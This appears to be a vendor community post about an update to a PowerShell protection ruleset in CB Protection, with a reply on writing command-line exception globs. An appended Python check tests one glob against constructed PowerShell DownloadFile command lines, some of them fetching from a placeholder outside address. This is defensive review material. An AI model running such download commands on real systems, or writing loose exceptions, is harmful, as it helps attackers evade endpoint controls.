The CB Protection Powershell Rapid Config has been updated.

Based on community feedback, we’ve updated the Powershell Rapid Config. These new updates will be pushed out today via the CDC to all 8.0 P7 and later CB Protection servers.

If you already have the Powershell Rapid Config enabled, these updates should not modify your existing settings.

The following additions have been made:

  • You now have the ability to add exception cases to the protections.

 

  • In the Downgrade Attacks section you can now Report or Block when 64-bit PowerShell executes the 32-bit version of PowerShell. If you have the Rapid Config enabled, this new protection will be enabled in Report mode.

 

Thank you to the community for your ongoing support and feedback.

Larry

Comments

Is there any guidance on HOW to format exceptions? 

Hi,

The exceptions would be formatted as command line macros. 
There are descriptions of the various command line macro options in the help. 
Taking the second section that is protecting against command lines that include downloadfile as an example: if you wanted to allow myfile.txt to be downloaded, you could add an exception such as the following to that section:
<cmdline:*.downloadfile*myfile.txt*>*
That would allow .downloadfile followed by anything that includes myfile.txt.

I hope that helps.
Mark
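
An added check, not part of the original reply or of the product: it evaluates the glob from the exception above against constructed command lines to show what else that exception would exempt. It assumes `*` matches any run of characters, as the reply describes, and that matching is case-insensitive; the host name, the addresses and the narrower pattern are placeholders.

```python
from fnmatch import fnmatchcase

# Glob from the exception in the reply above (the text between "<cmdline:" and ">").
PAGE_GLOB = "*.downloadfile*myfile.txt*"
# Constructed narrower variant that pins the source URL; the host is a placeholder.
PINNED_GLOB = "*.downloadfile('https://files.example.internal/myfile.txt'*"

PREFIX = "powershell.exe -c (New-Object Net.WebClient).DownloadFile("
# Constructed command lines for the review; none come from the page.
SAMPLES = {
    "intended": PREFIX + "'https://files.example.internal/myfile.txt','C:\\Temp\\myfile.txt')",
    "other_host": PREFIX + "'http://203.0.113.10/myfile.txt','C:\\Temp\\a.txt')",
    "name_in_query": PREFIX + "'http://203.0.113.10/data.bin?f=myfile.txt','C:\\Temp\\data.bin')",
    "name_in_dest": PREFIX + "'http://203.0.113.10/data.bin','C:\\Temp\\myfile.txt')",
    "unrelated": PREFIX + "'https://files.example.internal/other.txt','C:\\Temp\\other.txt')",
}


def exempted(glob: str, cmdline: str) -> bool:
    """True if the command line matches the exception glob.

    Assumption: case-insensitive match, '*' = any run of characters.
    """
    return fnmatchcase(cmdline.lower(), glob.lower())


def review(glob: str) -> dict:
    """Map each sample name to whether the exception would exempt it."""
    return {name: exempted(glob, cmd) for name, cmd in SAMPLES.items()}


def unintended(glob: str, intended=("intended",)) -> list:
    """Names of samples the exception exempts beyond the intended ones."""
    return sorted(n for n, hit in review(glob).items() if hit and n not in intended)


if __name__ == "__main__":
    for glob in (PAGE_GLOB, PINNED_GLOB):
        print(glob)
        for name, hit in review(glob).items():
            print(f"  {name:14} {'exempted' if hit else 'still covered'}")
```

Running candidate exceptions through a list of command lines like this before saving them shows whether the file name alone, or the full source, is what the exception actually keys on.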

Article Information
Creation Date: 09-16-2019